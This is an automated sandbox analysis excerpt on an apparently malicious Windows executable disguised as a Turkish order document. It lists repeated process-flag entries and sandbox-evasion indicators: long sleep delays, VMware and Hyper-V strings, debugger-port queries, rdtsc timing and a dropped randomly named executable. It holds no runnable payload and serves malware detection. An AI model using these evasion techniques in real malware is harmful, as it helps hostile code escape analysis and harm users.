Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe PID: 7512, type: MEMORYSTR
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\fc.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: 1270000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: 2CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: 2BF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: 7C70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: 8C70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: 8E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: 9E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: A180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: B180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: C180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: D640000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: E640000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: F640000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: FD00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0193096E rdtsc 3_2_0193096E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3531 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1039 Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Window / User API: threadDelayed 436 Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Window / User API: threadDelayed 9535 Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\fc.exe API coverage: 2.6 %
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe TID: 7532 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 7204 Thread sleep count: 436 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 7204 Thread sleep time: -872000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 7204 Thread sleep count: 9535 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 7204 Thread sleep time: -19070000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824 Thread sleep time: -75000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824 Thread sleep count: 42 > 30 Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824 Thread sleep time: -42000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824 Thread sleep time: -46500s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003ABF60 FindFirstFileW,FindNextFileW,FindClose, 9_2_003ABF60
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: firefox.exe, 0000000C.00000002.2447212608.000001D97B93C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684331128.0000000000D46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} CoF
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684331128.0000000000D46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: fc.exe, 00000009.00000002.4151524691.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152197155.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0193096E rdtsc 3_2_0193096E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_004176B3 LdrLoadDll, 3_2_004176B3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197019F mov eax, dword ptr fs:[00000030h] 3_2_0197019F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197019F mov eax, dword ptr fs:[00000030h] 3_2_0197019F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197019F mov eax, dword ptr fs:[00000030h] 3_2_0197019F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197019F mov eax, dword ptr fs:[00000030h] 3_2_0197019F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AC188 mov eax, dword ptr fs:[00000030h] 3_2_019AC188
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AC188 mov eax, dword ptr fs:[00000030h] 3_2_019AC188
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01930185 mov eax, dword ptr fs:[00000030h] 3_2_01930185
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EA197 mov eax, dword ptr fs:[00000030h] 3_2_018EA197
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EA197 mov eax, dword ptr fs:[00000030h] 3_2_018EA197
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EA197 mov eax, dword ptr fs:[00000030h] 3_2_018EA197
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01994180 mov eax, dword ptr fs:[00000030h] 3_2_01994180
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01994180 mov eax, dword ptr fs:[00000030h] 3_2_01994180
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0196E1D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0196E1D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E1D0 mov ecx, dword ptr fs:[00000030h] 3_2_0196E1D0
